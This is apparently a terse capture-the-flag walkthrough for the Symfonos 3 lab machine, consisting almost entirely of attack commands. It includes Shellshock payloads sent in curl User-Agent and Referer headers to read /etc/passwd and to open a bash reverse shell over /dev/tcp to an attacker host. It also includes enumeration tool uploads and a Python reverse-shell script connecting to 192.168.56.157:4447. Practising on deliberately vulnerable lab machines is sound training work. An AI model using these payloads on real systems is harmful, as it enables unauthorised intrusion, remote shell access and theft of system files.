Commands:

netdiscover -i eth1

nmap -A (IP)

dirb http://(IP)

dirb http://(IP)/gate/underworld

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://(IP)/cgi-bin/underworld

nc -nlvp 4446

curl -H "Referer: () { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/(Kali IP)/4446 0>&1 &" http://(Symfonos 3 IP)/cgi-bin/underworld

python -c 'import pty; pty.spawn("/bin/bash")'

sudo -l

tcpdump -nntttttAi lo

ssh hades@(IP)

scp LinEnum.sh hades@(IP):/home/hades

scp pspy32 hades@(IP):/home/hades

./pspy32

vi python.py
import socket,subprocess,os

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.157",4447))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])


URLs:
https://github.com/DominicBreuker/pspy/blob/master/README.md